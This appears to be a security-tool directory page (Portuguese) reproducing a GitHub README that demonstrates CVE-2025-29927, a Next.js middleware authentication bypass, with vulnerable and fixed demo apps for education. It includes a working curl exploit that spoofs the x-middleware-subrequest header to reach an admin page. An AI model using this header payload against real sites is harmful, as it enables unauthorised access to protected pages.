Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29927 — Demonstração do CVE-2025-29927: bypass de autenticação do middleware Next.js via falsificação de cabeçalho x-middleware-subrequest. Inclui exemplos de aplicativos vulneráveis e corrigidos para educação em segurança. | Kitploit
Ferramentas/GitHubGitHub/dante01yoon/cve-2025-29927
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebAutenticaçãoConfiguração IncorretaAprendizado e Educação
GitHubdante01yoon/cve-2025-29927

CVE-2025-29927

Demonstração do CVE-2025-29927: bypass de autenticação do middleware Next.js via falsificação de cabeçalho x-middleware-subrequest. Inclui exemplos de aplicativos vulneráveis e corrigidos para educação em segurança.

Ver Repositório
50há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Demonstração da Vulnerabilidade do Next.js (CVE-2025-29927)

Este repositório contém uma demonstração da vulnerabilidade CVE-2025-29927 do Next.js, que afeta as versões 15.2.2 e anteriores do Next.js. A vulnerabilidade permite que atacantes ignorem as verificações de autenticação do middleware ao definir um cabeçalho x-middleware-subrequest.

Estrutura do Repositório

Este é um monorepo NX contendo duas aplicações Next.js:

  1. vulnerable-app: Usa Next.js 15.2.2 com a vulnerabilidade
  2. fixed-app: Usa Next.js 15.2.3 com a correção implementada

Explicação da Vulnerabilidade

Nas versões do Next.js anteriores à 15.2.3, existe uma vulnerabilidade de segurança na implementação do middleware. O middleware não valida corretamente a origem do cabeçalho x-middleware-subrequest, permitindo que atacantes falsifiquem este cabeçalho e ignorem as verificações de autenticação baseadas no middleware.

Como Executar a Demonstração

Pré-requisitos

  • Node.js 18 ou superior
  • npm ou yarn
  • Docker (opcional, para implantação em contêiner)

Executando a Aplicação Vulnerável

root@kitploit:~
# Navegue até o repositório
cd nextjs-vulnerability

# Instale as dependências da aplicação vulnerável
cd apps/vulnerable-app
npm install

# Inicie a aplicação vulnerável
npm run dev

A aplicação vulnerável estará disponível em http://localhost:3000.

Executando a Aplicação Corrigida

root@kitploit:~
# Navegue até o repositório
cd nextjs-vulnerability

# Instale as dependências da aplicação corrigida
cd apps/fixed-app
npm install

# Inicie a aplicação corrigida
npm run dev

A aplicação corrigida estará disponível em http://localhost:3001.

Usando Docker

Você também pode executar as aplicações usando Docker:

root@kitploit:~
# Para a aplicação vulnerável
cd apps/vulnerable-app
docker build -t nextjs-vulnerable .
docker run -p 3000:3000 nextjs-vulnerable

# Para a aplicação corrigida
cd apps/fixed-app
docker build -t nextjs-fixed .
docker run -p 3001:3000 nextjs-fixed

Demonstrando a Vulnerabilidade

  1. Abra a aplicação vulnerável (http://localhost:3000)
  2. Clique em "Admin" na barra de navegação
  3. Você será redirecionado para a página de login, pois não está autenticado
  4. Agora tente acessar a página de admin diretamente com a vulnerabilidade:
root@kitploit:~
# Usando curl
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

# Ou use uma extensão de navegador como ModHeader para adicionar o cabeçalho
# e então visite http://localhost:3000/admin

Com a versão vulnerável (15.2.2), você conseguirá acessar a página de admin sem autenticação adicionando o cabeçalho x-middleware-subrequest.

Com a versão corrigida (15.2.3), o middleware valida corretamente a origem deste cabeçalho, e você ainda será redirecionado para a página de login.

Credenciais de Login

Para fins de demonstração, você pode fazer login com:

  • Nome de usuário: admin
  • Senha: password123

Recomendação de Segurança

Se você está usando Next.js em produção, certifique-se de atualizar para a versão 15.2.3 ou superior para se proteger contra esta vulnerabilidade.

Baixar ferramenta